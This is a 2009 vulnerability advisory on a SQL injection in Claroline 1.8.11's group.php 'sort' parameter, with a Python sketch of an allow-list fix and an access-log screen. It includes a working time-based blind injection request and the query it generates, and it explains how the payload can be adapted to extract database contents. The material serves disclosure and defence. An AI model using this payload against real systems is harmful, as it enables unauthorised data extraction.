Author: Gerendi Sandor Attila (http://gsasec.blogspot.com/)
Date: May 05, 2009
Package: Claroline (1.8.11)
Product Homepage: http://www.claroline.net/
Versions Affected: v.1.8.11 (Other versions may also be affected)
Severity: High
The 'sort' parameter from '/claroline/group/group.php' is not sanitized before it is used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Example:
the request:
http://somehost/claroline/group/group.php?cidReq=TEST1&sort=IF(FALSE,1,SLEEP(10))&dir=3
will generate the following SQL query:
SELECT * FROM `c_TEST1_group_team` `g`
# retrieve the tutor id
LEFT JOIN `claroline_1_8_11`.`cl_user` AS `tutor`
ON `tutor`.`user_id` = `g`.`tutor`
# retrieve the user group(s)
LEFT JOIN `c_TEST1_group_rel_team_user` AS `ug`
ON `ug`.`team` = `g`.`id` AND `ug`.`user` = 0
# count the registered users in each group
LEFT JOIN `c_TEST1_group_rel_team_user` `ug2`
ON `ug2`.`team` = `g`.`id`
GROUP BY `g`.`id`
ORDER BY IF(FALSE,1,SLEEP(10)) DESC LIMIT 0, 20
This query takes about 10 seconds to complete. Replacing the FALSE element (from IF(FALSE,1,SLEEP(10))) with conditional expressions can be used to extract arbitrary data from the database.
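The root cause is that the 'sort' value reaches the ORDER BY clause as raw text. The fix is to treat it as a key into an allow-list of column names rather than as SQL. The following Python is an added illustration written for this advisory; it is not Claroline's PHP code, the column names in the allow-list and the meaning of the 'dir' values are placeholders (the advisory does not state them), and the access-log lines are constructed. It shows the vulnerable concatenation pattern beside the allow-listed form, plus a small screen that pulls 'sort' values out of web-server access-log lines so a defender can spot values that no legitimate column name would contain.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed allow-list: the real columns group.php sorts by are not given in the
# advisory, so these stand in for them. The values are the only strings that
# may ever be spliced into the ORDER BY clause.
ALLOWED_SORT_COLUMNS = {
    "id": "`g`.`id`",
    "name": "`g`.`name`",
}
DEFAULT_SORT = "id"

# Assumed mapping of the 'dir' request parameter (the advisory shows dir=3 but
# does not define it); anything unknown falls back to ASC.
DIRECTIONS = {"3": "DESC"}

# Shortened form of the query from the advisory; only the ORDER BY matters here.
BASE_QUERY = "SELECT * FROM `c_TEST1_group_team` `g` GROUP BY `g`.`id`"


def vulnerable_order_by(sort: str, direction: str) -> str:
    """Vulnerable pattern (the behaviour the advisory describes):
    the request parameter is concatenated straight into the query."""
    order = DIRECTIONS.get(direction, "ASC")
    return f"{BASE_QUERY} ORDER BY {sort} {order} LIMIT 0, 20"


def safe_order_by(sort: str, direction: str) -> str:
    """Hardened pattern: the parameter selects an entry from the allow-list,
    so attacker-controlled text never becomes part of the SQL."""
    column = ALLOWED_SORT_COLUMNS.get(sort, ALLOWED_SORT_COLUMNS[DEFAULT_SORT])
    order = DIRECTIONS.get(direction, "ASC")
    return f"{BASE_QUERY} ORDER BY {column} {order} LIMIT 0, 20"


# A legitimate sort key is a bare identifier; anything else is worth a look.
IDENTIFIER = re.compile(r"^[A-Za-z0-9_]+$")
REQUEST_TARGET = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_sort_values(log_lines):
    """Return (line_number, sort_value) pairs for access-log entries whose
    'sort' parameter is not a plain identifier. URL-encoding is undone by
    parse_qs, so encoded payloads are inspected in decoded form."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_TARGET.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        for value in parse_qs(query).get("sort", []):
            if not IDENTIFIER.match(value):
                hits.append((number, value))
    return hits


# Constructed sample log lines in Apache common log format (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [05/May/2009:10:00:00 +0000] "GET /claroline/group/group.php'
    '?cidReq=TEST1&sort=name&dir=3 HTTP/1.1" 200 4120',
    '10.0.0.9 - - [05/May/2009:10:00:07 +0000] "GET /claroline/group/group.php'
    '?cidReq=TEST1&sort=IF%28FALSE%2C1%2CSLEEP%2810%29%29&dir=3 HTTP/1.1" 200 4120',
    '10.0.0.5 - - [05/May/2009:10:00:09 +0000] "GET /claroline/index.php HTTP/1.1" 200 880',
]

if __name__ == "__main__":
    payload = "IF(FALSE,1,SLEEP(10))"
    print("vulnerable:", vulnerable_order_by(payload, "3"))
    print("hardened:  ", safe_order_by(payload, "3"))
    for number, value in suspicious_sort_values(SAMPLE_LOG):
        print(f"line {number}: suspicious sort value {value!r}")
```

The allow-list approach is preferable to escaping because a column name in ORDER BY cannot be bound as a prepared-statement parameter; the only safe option is to never let user text become SQL at all. The log screen is deliberately simple: it flags any 'sort' value that is not a bare identifier, which catches the advisory's payload whether or not it is URL-encoded.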
Status:
1. Contacted the author on May 07, 2009 via http://forum.claroline.net/
Note:
- The original advisory will be published at http://gsasec.blogspot.com/, but only after the vendor has received, validated and corrected the vulnerability. At that time it will also be reported to Secunia and SecurityFocus.